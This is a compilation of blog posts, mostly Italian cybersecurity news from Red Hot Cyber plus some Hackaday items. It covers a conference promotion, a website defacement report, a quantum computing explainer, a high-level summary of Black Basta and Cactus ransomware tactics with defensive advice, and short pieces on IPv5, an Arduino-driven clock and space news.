La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Una inquadratura dei partecipanti alla Capture The Flag
Tutto Questo grazie Ai Nostri Sponsor
La realizzazione di questo evento non sarebbe possibile senza il prezioso supporto dei nostri sponsor. La loro collaborazione è fondamentale per offrire un’esperienza formativa e coinvolgente a tutti i partecipanti.
- Sponsor Sostenitori Workshop
- Sponsor Sostenitori
- Sponsor Platinum
- Sponsor Gold
- Sponsor Silver
Inoltre ringraziamo tutti i nostri media Partner che sono i Fintech Awards, i Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi e RedHotCyber Academy.
Invitiamo tutte le aziende interessate a sostenere la Red Hot Cyber Conference 2025 a contattarci per informazioni sui pacchetti di sponsorizzazione ancora disponibili. La vostra partecipazione contribuirà a promuovere la cultura della sicurezza informatica e a formare i professionisti del futuro.
- Programma della Red Hot Cyber Conference 2025
- Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
- Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
- Regolamento per la Capture The Flag (CTF)
Non perdete l’opportunità di essere parte di questo importante appuntamento nel mondo della cybersecurity!
Dei ragazzi riprendono il workshop “hands on”
Ragazzi che stanno seguendo i workshop “hands-on”Francesco Conti, Luca Vinciguerra e Salvatore RIcciardi del gruppo AI di Red Hot Cyber presentano il workshop “COME CREARE UN SISTEMA DI FACE RECOGNITION CON LE AI”
Andrea Tassotti di CyberSecurityUP presenta il workshop “COME HACKERARE UN ESEGUIBILE ELUDENDO CONTROLLI APPLICATIVI”
Immagine dei Ragazzi che giocano alla Capture The Flag
Immagine dei Ragazzi che giocano alla Capture The Flag
Immagine dei Ragazzi che giocano alla Capture The Flag
Una inquadratura dei partecipanti alla Capture The Flag
Platea alla Red Hot Cyber Conference 2024
Ingresso di SPOT della Boston Dynamics alla Red Hot Cyber Conference 2024
Pranzo alla Red Hot Cyber Conference 2024
Una inquadratura dei partecipanti alla CTF sulla seconda scalinata del teatro
Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024
L'articolo Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile! proviene da il blog della sicurezza informatica.
Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo
Negli ultimi giorni, diversi siti web italiani sono stati presi di mira da un attacco di defacement, una tecnica utilizzata per modificare il contenuto di una pagina web senza il consenso del proprietario. Tra i siti colpiti figurano:
- hxxps://viralproduction[.]it/1337.php
- hxxps://diegolucattini[.]it/1337.php
Questi attacchi sono stati rivendicati dal gruppo denominato !FAKESITE, che ha lasciato la propria firma sulle pagine defacciate, accompagnata da un messaggio provocatorio e un elenco di pseudonimi di presunti membri del collettivo. Di seguito quanto gli hacktivisti hanno riportato all’interno dei siti:
FIRMATO DA FAKESITE | SISTEMA DI ERRORE INFORMATICO
"Se mi chiedi delle vulnerabilità di un sistema, non ho una risposta. Ma ciò che è certo è che la sicurezza più vulnerabile è quella degli esseri umani stessi"
CONTATTAMI CLICCA QUI
Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec
[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ]
Cos’è un Deface?
Il defacing è una forma di hacking che consiste nell’alterare il contenuto di un sito web, sostituendo la homepage o aggiungendo elementi non autorizzati. Questo tipo di attacco può essere realizzato sfruttando vulnerabilità nei server web, nei CMS (Content Management System) o tramite credenziali compromesse.
I deface vengono spesso utilizzati per diversi scopi:
- Dimostrazione di vulnerabilità: per evidenziare falle nella sicurezza di un sistema.
- Messaggi politici o sociali: in casi di hacktivismo, gli attaccanti veicolano messaggi di protesta.
- Propaganda: alcuni gruppi utilizzano il defacing per diffondere ideologie o per fare pubblicità a determinate cause.
- Semplice vandalismo: in alcuni casi, gli attacchi avvengono senza uno scopo preciso, ma solo per il gusto di danneggiare.
Hacktivismo: Quando l’Hacking Diventa Protesta
L’hacktivismo è una forma di attivismo che sfrutta le tecniche informatiche per promuovere una causa politica o sociale. I gruppi hacktivisti spesso attaccano siti governativi, istituzionali o aziendali per sensibilizzare l’opinione pubblica su determinate problematiche. Alcuni dei gruppi più noti in questo campo sono Anonymous, Lizard Squad e LulzSec.
Nel caso del gruppo !FAKESITE il messaggio lasciato sui siti attaccati suggerisce un intento più legato al cyber-vandalismo o alla dimostrazione di competenze, piuttosto che a una vera e propria causa politica. Tuttavia, la presenza di riferimenti a una “Cyber Error System” e a collettivi come “Hacktivist Of Garuda” potrebbe suggerire un legame con movimenti più ampi della scena underground del hacking.
Implicazioni e Sicurezza
Attacchi di questo tipo evidenziano l’importanza di adottare misure di sicurezza adeguate per proteggere i siti web da intrusioni non autorizzate. Alcuni accorgimenti fondamentali includono:
- Aggiornare regolarmente software e plugin.
- Utilizzare password complesse e autenticazione a due fattori.
- Monitorare i log di accesso per individuare attività sospette.
- Implementare firewall e sistemi di rilevamento delle intrusioni.
Il defacing, sebbene possa sembrare un’azione innocua rispetto ad altri attacchi informatici più devastanti come il ransomware, può comunque causare danni reputazionali e finanziari significativi alle vittime.
Resta da vedere se il gruppo !FAKESITE continuerà con questo tipo di attacchi o se il loro operato si limiterà a questi episodi isolati. Nel frattempo, è essenziale che i gestori di siti web rafforzino le proprie difese per evitare di cadere vittime di simili incursioni.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
L'articolo Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo proviene da il blog della sicurezza informatica.
Il presente
Quantum Computing: innovazione tecnologica, sfide e opportunità per il futuro
Il quantum computing è un paradigma di calcolo che sfrutta i principi della meccanica quantistica per elaborare informazioni in modo radicalmente diverso rispetto ai calcolatori classici. Mentre i computer tradizionali utilizzano bit che possono assumere uno dei due stati, 0 o 1, i computer quantistici impiegano qubit, che grazie alla proprietà della sovrapposizione quantistica, possono esistere simultaneamente in più stati. Altra proprietà fondamentale è l’entanglement quantistico, che permette ai qubit di essere correlati in modo tale che lo stato di uno influenzi istantaneamente lo stato dell’altro, anche se separati da distanze enormi.
Queste caratteristiche offrono potenzialità straordinarie per risolvere problemi che sono difficili o impossibili da affrontare con i calcolatori classici, come la simulazione di molecole complesse per la scoperta di farmaci o la decifrazione di algoritmi criptografici.
Un po’ di storia
Il concetto di quantum computing è stato teorizzato per la prima volta nei primi anni ’80.
Uno dei primi a suggerire che la meccanica quantistica potesse essere applicata al calcolo è stato il fisico Richard Feynman. Nel 1981, Feynman tenne una conferenza in cui sostenne che i computer classici non sarebbero mai stati in grado di simulare in modo efficiente i sistemi quantistici poiché il comportamento di questi sistemi richiede un tipo di calcolo che può essere gestito solo da un dispositivo che sfrutta le leggi della meccanica quantistica. Potremmo anche dire: così nacque il quantum computing!
Nel 1985, David Deutsch dell’Università di Oxford propose una versione universale di un computer quantistico, un modello che potesse teoricamente eseguire qualsiasi calcolo che un computer classico sarebbe in grado di eseguire, ma in modo molto più rapido grazie all’uso di qubit e dell’entanglement.
Il quantum computing, a ben guardare, ha il potenziale di rivoluzionare molti settori. Un esempio è la simulazione di sistemi quantistici, che è impossibile per i computer classici a causa della crescita esponenziale della complessità computazionale. In ambiti come la chimica, la fisica dei materiali e la farmacologia, i computer quantistici potrebbero accelerare la scoperta di nuovi farmaci, materiali e tecnologie.
Tipologie di calcolo quantistico: Gate-based vs. Quantum Annealing.
Il calcolo quantistico universale è chiamato “gate-based” (IBM, Google, Rigetti) e utilizza un approccio simile a quello dei computer classici, ma fa uso di porte quantistiche che manipolano i qubit in vari stati quantistici. Questo approccio permette di eseguire una varietà di operazioni su più qubit, ma è molto difficile da scalare, poiché i qubit devono essere mantenuti in uno stato coerente per periodi di tempo più lunghi.
Altro approccio è quelo conosciuto come “quantum annealing” (D-Wave) che si utilizza per la soluzione di problemi di ottimizzazione, dove si cerca di trovare il minimo globale di un sistema. Tale approccio non è versatile come i sistemi gate-based e non sembra poter essere impiegato per eseguire calcoli generali.
Il report “Quantum Decade” di IBM
Il report “The Quantum Decade”, recentemente pubblicato da IBM, ci permette di capire la visione ambiziosa della società per il futuro del quantum computing, che punta a una rivoluzione tecnologica da attuare nei prossimi dieci anni. IBM si impegna a sviluppare computer quantistici scalabili e ad affrontare le sfide tecniche legate alla stabilità dei qubit, alla decoerenza e alla correzione degli errori. La decoerenza quantistica, in particolare, che si verifica quando un sistema quantistico perde la sua coerenza a causa dell’interazione con l’ambiente esterno, è uno degli ostacoli principali per la costruzione di computer quantistici affidabili. Nel suo report IBM prevede che nei prossimi dieci anni vi sarà un’ampia diffusione della tecnologia attraverso la piattaforma IBM Quantum, che permetterà a ricercatori e aziende di accedere a computer quantistici via cloud, aprendo la strada a nuove applicazioni nei settori della chimica, della finanza, dell’IA e dell’ottimizzazione.
Tra i principali obiettivi vi è il miglioramento delle metodologie per la misura della potenza dei computer quantistici, con l’introduzione del Quantum Volume, che misura la reale capacità di un computer quantistico di eseguire calcoli complessi, considerando non solo il numero di qubit, ma anche la loro qualità, la durata della coerenza quantistica, la capacità di correggere errori e l’efficacia nel gestire circuiti quantistici di crescente complessità senza compromettere l’affidabilità dei risultati. Parte degli sforzi andrà anche nella esplorazione di nuove architetture basate su qubit superconduttori e materiali topologici.
Il quantum computing è visto come una tecnologia in via di maturazione che sarà in grado di risolvere problemi complessi, dalla simulazione di materiali alla progettazione di nuovi farmaci, segnando un progresso fondamentale nella scienza e nell’industria.
IonQ e la sua architettura a qubit ionici
IonQ è una delle aziende più innovative nel campo del quantum computing, con un approccio unico che utilizza qubit ionici per la costruzione dei suoi computer quantistici. La tecnologia di IonQ si basa sull’uso di ioni intrappolati, che sono atomi caricati elettricamente e manipolati con precisione attraverso campi elettrici e magnetici. Ogni qubit è rappresentato da uno stato quantistico di un singolo atomo, che viene “intrappolato” in un campo elettromagnetico in una struttura chiamata trappola ionica. Questi ioni sono poi manipolati con laser ad alta precisione per eseguire operazioni quantistiche. Una delle principali caratteristiche dei qubit ionici è la loro straordinaria stabilità, che li rende meno suscettibili ai disturbi ambientali e alla decoerenza rispetto ad altre tecnologie di qubit, come quelli basati su circuiti superconduttori.
IonQ si distingue per la sua capacità di ottenere un’alta qualità dei qubit, riducendo il rumore esterno, che è una delle principali sfide nella computazione quantistica. La società ha sviluppato un’architettura scalabile che permette di manipolare un numero crescente di qubit con precisione, rendendo possibile la realizzazione di calcoli complessi e l’esecuzione di algoritmi quantistici. Una delle innovazioni principali di IonQ è la piattaforma IonQ Cloud, che consente a ricercatori, aziende e sviluppatori di accedere a computer quantistici basati su ioni intrappolati tramite il cloud, rendendo la tecnologia quantistica più accessibile e facilitandone l’adozione nei settori più disparati.
Sebbene la tecnologia dei qubit ionici necessiti ancora di perfezionamenti per arrivare a una produzione di massa, IonQ ha fatto importanti progressi nella scalabilità e nella precisione, posizionandosi come una delle aziende di riferimento nel panorama del quantum computing. La società è impegnata nel rendere il quantum computing una tecnologia concreta e utilizzabile per applicazioni pratiche.
Il progetto Majorana 1 di Microsoft
Il progetto Majorana 1 si concentra sulla creazione di “qubit topologici”, che sfruttano le proprietà dei fermioni di Majorana, particelle la cui esistenza fu teorizzata dal fisico Ettore Majorana. Questi qubit particolari sono progettati per sfruttare le proprietà dei materiali topologici, che sono considerati particolarmente promettenti per la costruzione di computer quantistici più stabili e scalabili. I qubit topologici, infatti, dovrebbero essere più resistenti ai disturbi ambientali, come la decoerenza, che rappresenta uno dei principali ostacoli per i computer quantistici attuali. Tuttavia, per funzionare correttamente, i qubit topologici richiedono temperature estremamente basse, prossime allo zero assoluto, per evitare interferenze ambientali. Per questo motivo, il processore Majorana 1 deve essere immerso in una scatola criogenica, che permette di mantenere la temperatura prossima allo zero assoluto. Questo progetto ambizioso potrebbe rappresentare una delle soluzioni più promettenti per superare i limiti delle attuali tecnologie quantistiche, ma richiede comunque avanzamenti significativi nella manipolazione di questi materiali e nella costruzione di computer quantistici scalabili.
Le principali difficoltà nel progetto riguardano la manipolazione delle particelle di Majorana, che sono estremamente difficili da rilevare e controllare, e le implicazioni che ciò ha per la costruzione di computer quantistici pratici e scalabili. Nonostante i progressi, ci sono ancora sfide significative da superare prima che il Majorana 1 possa essere una tecnologia operativa e diffusa e raggiungere il promesso “un milione di qubit nel palmo della mano“.
Qubit a temperatura ambiente
Mentre molti progetti di computer quantistici richiedono temperature criogeniche per garantire il funzionamento dei qubit, esistono anche iniziative che puntano a sviluppare qubit operativi a temperatura ambiente. La creazione di qubit che possano funzionare senza la necessità di raffreddamento estremo rappresenterebbe una svolta significativa per la realizzazione di computer quantistici pratici e scalabili. Diverse aziende e istituti di ricerca stanno lavorando su queste tecnologie alternative. Ad esempio, Google sta esplorando l’uso di qubit fotonici, che sfruttano la luce per rappresentare e manipolare l’informazione quantistica, con il vantaggio di poter operare a temperatura ambiente. Allo stesso modo, la startup Rigetti Computing sta lavorando su un approccio basato su qubit superconduttori, ma con l’obiettivo di ridurre le necessità di raffreddamento attraverso l’uso di nuove tecnologie di isolamenti termici e la progettazione di sistemi di gestione termica più efficienti. Inoltre, alcune ricerche nell’ambito della spintronica e dei materiali 2D stanno cercando di sfruttare le proprietà quantistiche di materiali come il grafene, che potrebbero consentire la manipolazione dei qubit a temperatura ambiente, riducendo notevolmente i costi e le complessità operative. Sebbene questi approcci siano ancora in fase di sviluppo, il potenziale di computer quantistici operativi a temperatura ambiente potrebbe aprire la strada a un futuro in cui la computazione quantistica sarà accessibile e praticabile su larga scala.
D-Wave: Quantum Annealing per l’ottimizzazione.
D-Wave è una delle aziende pionieristiche nel campo del quantum computing, e la sua tecnologia si distingue per l’approccio basato sul quantum annealing, che lo rende particolarmente adatto a risolvere problemi di ottimizzazione complessa. A differenza dei sistemi di calcolo quantistico “gate-based”, come quelli sviluppati da IBM o Google, che sono progettati per eseguire una vasta gamma di operazioni su qubit in stato di sovrapposizione, i sistemi D-Wave sono ottimizzati per trovare soluzioni al minimo globale di un problema di ottimizzazione. Questo approccio è utile in scenari come il riconoscimento di pattern, la pianificazione, e la logistica, dove è necessario esplorare una vasta quantità di possibili soluzioni per trovare la migliore.
Un aspetto distintivo dei computer D-Wave è il loro uso di un numero molto elevato di qubit. La versione più recente del sistema, D-Wave Advantage, contiene oltre 5000 qubit, un numero notevolmente superiore rispetto ai computer quantistici “gate-based” attuali, che ne contano generalmente meno di 200. Tuttavia, la capacità di D-Wave di gestire un numero così grande di qubit non significa necessariamente che possieda la stessa flessibilità o potenza di calcolo universale dei sistemi gate-based. I qubit nel sistema D-Wave sono meno interconnessi e non possono essere manipolati con la stessa precisione dei qubit superconduttori o ionici utilizzati in altri approcci.
Nonostante le sue limitazioni in termini di versatilità, la tecnologia di D-Wave ha già delle applicazioni concrete, come il miglioramento di algoritmi di ottimizzazione, simulazioni complesse e risoluzioni di problemi in settori come la finanza, la chimica, e l’energia.
Quantum Computing e cybersecurity
Il quantum computing rappresenta una minaccia significativa per la sicurezza dei sistemi crittografici tradizionali, in particolare per i metodi basati su algoritmi di cifratura a chiave pubblica come RSA e Elliptic Curve Cryptography (ECC). Questi algoritmi sono fondamentali per la protezione delle comunicazioni su Internet e dei dati sensibili, inclusi i sistemi bancari, le transazioni online e la protezione delle informazioni personali. Tuttavia, grazie alla capacità dei computer quantistici di risolvere problemi matematici complessi in tempi molto brevi, l’efficacia di questi algoritmi è messa in discussione.
In particolare, l’algoritmo di Shor, sviluppato da Peter Shor nel 1994, dimostra come un computer quantistico possa risolvere rapidamente i problemi di fattorizzazione e logaritmo discreto, che sono alla base della sicurezza di RSA e ECC. Con l’impiego di algoritmi come Shor, un computer quantistico potrebbe rompere queste tecniche di crittografia, decifrando in tempi brevi le comunicazioni protette da tali metodi.
L’adozione di computer quantistici su larga scala potrebbe quindi compromettere la sicurezza delle informazioni, minacciando le fondamenta della sicurezza informatica moderna.
Per affrontare questa nuova realtà, la comunità scientifica e industriale ha iniziato a sviluppare algoritmi di crittografia post-quantistica. Questi algoritmi sono progettati per resistere agli attacchi da parte dei computer quantistici. La crittografia post-quantistica si basa su principi matematici che sono considerati sicuri anche contro i potenti calcolatori quantistici, e uno dei principali approcci in questo campo è la crittografia basata su lattice (lattice-based cryptography).
Altri approcci emergenti includono codici correttori di errore, hash-based cryptography e multivariate polynomial cryptography, tutti progettati per garantire la sicurezza a lungo termine in un mondo in cui la tecnologia quantistica sta diventando realtà.
Il NIST (National Institute of Standards and Technology), già dal 2016 ha avviato un processo per identificare e standardizzare algoritmi di crittografia post-quantistica. Il processo di selezione, che coinvolge una valutazione approfondita di vari algoritmi, ha lo scopo di definire soluzioni robuste che possano sostituire gli algoritmi vulnerabili quando i computer quantistici saranno abbastanza potenti da mettere a rischio la crittografia esistente.
Inoltre, enti internazionali, aziende tecnologiche e organizzazioni governative stanno investendo risorse significative nella sicurezza quantistica, esplorando nuovi approcci come la crittografia quantistica (che utilizza i principi della meccanica quantistica stessa per garantire la sicurezza) e sviluppando nuove infrastrutture sicure che possano sostenere la transizione verso un ambiente digitale protetto in un mondo con computer quantistici.
Applicazioni emergenti
Il futuro del quantum computing è entusiasmante e ricco di potenzialità, ma allo stesso tempo incerto e impegnativo. Mentre la tecnologia è ancora in fase di sviluppo e le sfide tecniche da superare sono notevoli, i progressi che stiamo vedendo oggi potrebbero aprire la strada a rivoluzioni in molteplici settori. Le applicazioni del quantum computing non si limitano alla sola crittografia o alla cybersicurezza, ma si estendono a campi che spaziano dalla medicina all’intelligenza artificiale, dalla simulazione chimica alla logistica avanzata.
Nel settore della medicina, i computer quantistici potrebbero accelerare enormemente la scoperta di nuovi farmaci e la comprensione di malattie complesse. La simulazione di molecole e reazioni chimiche a livello quantistico potrebbe, infatti, portare alla creazione di farmaci più efficaci, riducendo notevolmente i tempi e i costi della ricerca farmaceutica. Inoltre, la potenza computazionale offerta dal quantum computing potrebbe rivoluzionare la diagnostica medica, consentendo di elaborare grandi quantità di dati clinici con una velocità e precisione mai viste prima.
Un altro campo che potrebbe beneficiare enormemente del quantum computing è la simulazione chimica e la progettazione di materiali avanzati. Le simulazioni chimiche tradizionali sono limitate dalla capacità dei computer di elaborare le interazioni molecolari a livello atomico. I computer quantistici, grazie alla loro abilità di manipolare qubit in sovrapposizione e entanglement, possono affrontare simulazioni più complesse, aprendo la porta a scoperte scientifiche come materiali più resistenti, energie rinnovabili più efficienti e nuovi processi chimici.
L’ottimizzazione è un settore di ricerca in cui il quantum computing promette di fare enormi passi avanti soprattutto nella risoluzione di problemi complessi, come la pianificazione delle risorse, la logistica e il miglioramento di algoritmi di ricerca.
Prospettive future
Uno degli sviluppi più interessanti riguarda la creazione di un quantum internet. Questa nuova rete, basata sulla crittografia quantistica che sfrutta i principi della meccanica quantistica per migliorare la sicurezza, promette di garantire un elevato livello di sicurezza nelle comunicazioni online, sfruttando il principio dell’entanglement quantistico. La Quantum Key Distribution (QKD), inoltre, permette lo scambio di chiavi crittografiche sicure tramite entanglement quantistico e rappresenta la base di questa nuova infrastruttura.
L’intelligenza artificiale e l’apprendimento automatico stanno diventando sempre più sofisticati, ma i calcolatori tradizionali, nonostante i loro enormi progressi, hanno dei limiti. Il Quantum Machine Learning (QML) potrebbe superare queste limitazioni, permettendo agli algoritmi di apprendimento automatico di trattare set di dati complessi con velocità e precisione incredibili. I modelli di apprendimento quantistici potrebbero rivoluzionare il modo in cui le macchine apprendono, migliorando significativamente la capacità di predire eventi, automatizzare processi e analizzare grandi volumi di dati non strutturati.
Eppure, nonostante le potenzialità, il quantum computing deve ancora superare importanti sfide. La decoerenza quantistica, come abbiamo visto in precedenza, è una delle principali difficoltà. Inoltre, la costruzione di computer quantistici scalabili, in grado di gestire grandi numeri di qubit senza errori, rimane una delle sfide tecniche più complesse. La ricerca continua a un ritmo molto sostenuto, vedremo dove ci porterà.
In conclusione, occorre considerare che come tutte le innovazioni, la transizione verso il quantum computing richiederà un significativo cambiamento nell’infrastruttura tecnologica, nella formazione delle risorse umane e nella gestione delle politiche governative e aziendali. Tutte cose che avranno un impatto profondo sulla nostra società.
L'articolo Quantum Computing: innovazione tecnologica, sfide e opportunità per il futuro proviene da il blog della sicurezza informatica.
Black Basta e Cactus: nuove tattiche con il malware BackConnect
Negli ultimi mesi, i gruppi ransomware Black Basta e Cactus hanno ampliato le loro tattiche d’attacco integrando il malware BackConnect nel loro arsenale. Questa evoluzione rappresenta una minaccia significativa per le organizzazioni a livello globale, combinando tecniche sofisticate per ottenere e mantenere l’accesso non autorizzato ai sistemi compromessi.
L’evoluzione delle tattiche di attacco
Secondo un’analisi pubblicata da Trend Micro, Black Basta e Cactus utilizzano nuove strategie per compromettere i sistemi aziendali. L’adozione del malware BackConnect consente agli attaccanti di stabilire connessioni persistenti sui sistemi infetti, facilitando operazioni di esfiltrazione dati e ulteriori attacchi.
Tecniche di ingegneria sociale per l’accesso iniziale
Gli aggressori fanno largo uso di tecniche di ingegneria sociale per ottenere l’accesso iniziale ai sistemi target. Una delle strategie più diffuse è l’invio massiccio di email, un vero e proprio bombardamento di messaggi che ha lo scopo di confondere le vittime e indurle ad aprire allegati malevoli o a cliccare su link dannosi. Oltre a questo, viene spesso adottata la tecnica dell’impersonificazione del supporto IT, attraverso la quale gli attaccanti si fingono tecnici aziendali per ottenere credenziali di accesso.
Un altro aspetto preoccupante riguarda lo sfruttamento di strumenti di collaborazione e assistenza remota come Microsoft Teams e Quick Assist. Questi strumenti, essenziali per il lavoro e il supporto tecnico, vengono utilizzati dagli attaccanti per espandere la loro presenza all’interno delle reti aziendali, aggirando così molte delle difese tradizionali.
DLL Side-Loading tramite OneDriveStandaloneUpdater.exe
Una delle tecniche più insidiose adottate dagli attaccanti è l’abuso del processo OneDriveStandaloneUpdater.exe per il caricamento laterale di DLL malevole, noto come DLL side-loading. Questa metodologia sfrutta il modo in cui Windows carica le librerie DLL, sostituendo una versione legittima con una dannosa. In questo modo, gli aggressori riescono a eseguire codice malevolo con privilegi elevati, garantendosi un accesso persistente ai sistemi compromessi. Il processo inizia con il posizionamento di una versione malevola della DLL nella stessa directory di esecuzione del file legittimo, forzandone così il caricamento automatico.
Distribuzione del malware BackConnect
Dopo aver ottenuto l’accesso alla rete target, gli attaccanti procedono con la distribuzione del malware BackConnect. Questo strumento consente di stabilire connessioni remote persistenti, fornendo agli aggressori un canale sicuro attraverso cui controllare il sistema infetto. Grazie a questa tecnica, riescono a evitare molte soluzioni di rilevamento basate sulle firme tradizionali e, allo stesso tempo, possono distribuire ulteriori payload malevoli, aumentando il livello di compromissione.
Utilizzo di servizi cloud per la distribuzione di malware
Per eludere le misure di sicurezza e rendere più difficile l’identificazione dei file dannosi, gli attaccanti sfruttano servizi di cloud storage commerciali. Ospitando malware su piattaforme legittime, riescono a diffonderlo senza destare sospetti, aggirando molte delle protezioni perimetrali che filtrano il traffico web. L’uso dei servizi cloud permette inoltre agli attaccanti di aggiornare dinamicamente i file malevoli, evitando così che vengano rapidamente individuati e rimossi dalle soluzioni di sicurezza.
Target e impatto globale
Dall’ottobre 2024, la maggior parte degli attacchi condotti attraverso queste tecniche si è verificata in Nord America ed Europa, con gli Stati Uniti tra i paesi più colpiti. Gli obiettivi principali sono stati le aziende del settore manifatturiero, seguite da quelle operanti nel settore finanziario e immobiliare. Questo tipo di attacchi dimostra una chiara strategia da parte degli aggressori, che tendono a prendere di mira settori particolarmente sensibili alla perdita di dati e alla compromissione delle operazioni.
L’integrazione di BackConnect nelle operazioni di Black Basta e Cactus segna un’evoluzione significativa delle minacce ransomware. L’uso combinato di ingegneria sociale, abuso di strumenti legittimi, DLL side-loading e servizi cloud rappresenta una sfida complessa per le aziende, che devono adottare contromisure adeguate. Implementare soluzioni avanzate di rilevamento basate sul comportamento degli utenti e sulle anomalie di rete diventa fondamentale per contrastare queste minacce. Inoltre, è essenziale investire nella formazione del personale, in modo da ridurre il rischio di cadere vittima di tecniche di social engineering. Monitorare attentamente l’uso degli strumenti di collaborazione e assistenza remota, adottando politiche di sicurezza basate sul principio del minimo privilegio, può contribuire a ridurre l’esposizione a questi attacchi.
Con l’evoluzione continua delle minacce ransomware, la consapevolezza e l’adozione di strategie di difesa avanzate rappresentano le migliori risorse per proteggere le infrastrutture aziendali da attacchi sempre più sofisticati.
L'articolo Black Basta e Cactus: nuove tattiche con il malware BackConnect proviene da il blog della sicurezza informatica.
IPV4, IPV6… Hey! What Happened to IPV5?
If you’ve ever been configuring a router or other network device and noticed that you can set up IPv4 and IPv6, you might have wondered what happened to IPv5. Well, thanks to [Navek], you don’t have to wonder anymore. Just watch the video below.
We will warn you of two things. First, the video takes a long time to get around to what IPv5 was. In addition, if you keep reading, there will be spoilers.
The first part of the video covers the general differences between IPv4 and IPv6, especially surrounding addressing. Then, it talks about how IP alone can’t do things you like to do for handling things like voice. For example, the IP layer doesn’t understand how much bandwidth exists between two points. It is only concerned with moving data from one point to another point.
To foster voice communications, there was a proposal for something called the stream protocol. It didn’t catch on. In fact, it was reincarnated as a proposal to move video, too, but it still didn’t catch on. However, the network header used the next number in sequence, which was… five!
So, really, the video title is a bit of a red herring. You didn’t forget IPv5; there simply was never an IPv5. There is, however, network protocol #5, which has little to do with IP and never caught on.
Still, an interesting walk down memory lane to a time when moving voice and video over the network was exotic high-tech. We love diving into the old network stuff like finger and UUCP.
youtube.com/embed/y-zeYSQdpCE?…
Clock Mechanism Goes Crazy for Arduino
You’ve doubtless seen those ubiquitous clock modules, especially when setting clocks for daylight savings time. You know the ones: a single AA battery, a wheel to set the time, and two or three hands to show the time. They are cheap and work well enough. But [Playful Technology] wanted to control the hands with an Arduino directly and, in the process, he shows us how these modules work.
If you’ve never studied the inside of these clock modules, you may be surprised about how they actually work. A crystal oscillator pulses a relatively large electromagnet. A small plastic gear has a magnetic ring and sits near the electromagnet.
Each time the polarity of the electromagnet flips, the ring turns 180 degrees to face the opposite magnetic pole to the electromagnet. This turns the attached gear which is meshed with other gears to divide the rotation rate down to once per 24 hours, once per hour, and once per minute. Pretty clever.
That makes it easy to control the hands. You simply detach the electromagnet from the rest of the circuit and control it yourself. The module he used had a mechanical limitation that prevents the hands from moving well at more than about 100 times normal speed.
We wondered how he made the hands reverse and, apparently, there is a way to get the drive gear to move in reverse, but it isn’t always reliable. Of course, you could also replace the drive mechanism with something like an RC servo or other motor and it sounds like he has done this and plans to show it off in another video.
We’ve seen the opposite trick before, too. If you really want an easy-to-control analog clock, try this one
youtube.com/embed/v142dbmIYq0?…
Hackaday Links: March 9, 2025
It’s been a busy week in space news, and very little of it was good. We’ll start with the one winner of the week, Firefly’s Blue Ghost Mission 1, which landed successfully on the Moon’s surface on March 2. The lander is part of NASA’s Commercial Lunar Payload Services program and carries ten scientific payloads, including a GPS/GNSS receiver that successfully tracked signals from Earth-orbiting satellites. All of the scientific payloads have completed their missions, which is good because the lander isn’t designed to withstand the long, cold lunar night only a few days away. The landing makes Firefly the first commercial outfit to successfully soft-land something on the Moon, and being the first at anything is always a big deal.
Slightly less impressive was Intuitive Machines’ attempt at a landing a day later. Their NOVA-C robotic lander Athena managed a somewhat controlled landing, but the spacecraft is lying on its side rather than upright, a surprisingly common failure mode for recent lunar landings. Also in the failure category is the loss of the world’s first private asteroid mining mission, as well as SpaceX Starship test flight 8, which ended in spectacular fashion this week as Starship exploded soon after booster separation. As usual, Scott Manley has the best analysis of the incident, which seemed to involve a fire in the engine bay that led to a rapid loss of thrust from four of its six engines, and sent the spacecraft tumbling before tearing itself apart. The only good news from the flight was the third successful catch of the returning booster by the chopsticks, which just never gets old.
What does get old is stories about printer manufacturers and their anti-consumer hijinks, especially when it involves one of the only manufacturers who wasn’t playing the “buy our consumables or we brick it” game. In addition to just about every other printer maker, Brother now stands accused of sending firmware up to printers that turns off functionality if non-OEM cartridges are used. The accusations come from Louis Rossman, well-known for his right-to-repair advocacy and, ironically, long-time proponent of Brother printers as least likely to be bricked. His accusation that “Brother is now among the rest of them” is based on a pretty small sample of affected users, and a self-selected one at that, so take that with the requisite amount of salt. For their part, Brother denies the claim, stating simply that “Brother firmware updates do not block the use of third-party ink in our machines.” They don’t go much beyond that by way of an explanation of what’s happening to the users reporting problems other than to say that the users may be confused by the fact that “we like to troubleshoot with Brother Genuine supplies.” What the real story is is anyone’s guess at this point, and the best advice we can offer is either to avoid printers altogether, or just buy the cheapest one you can get and harvest it for parts once the starter cartridges are empty.
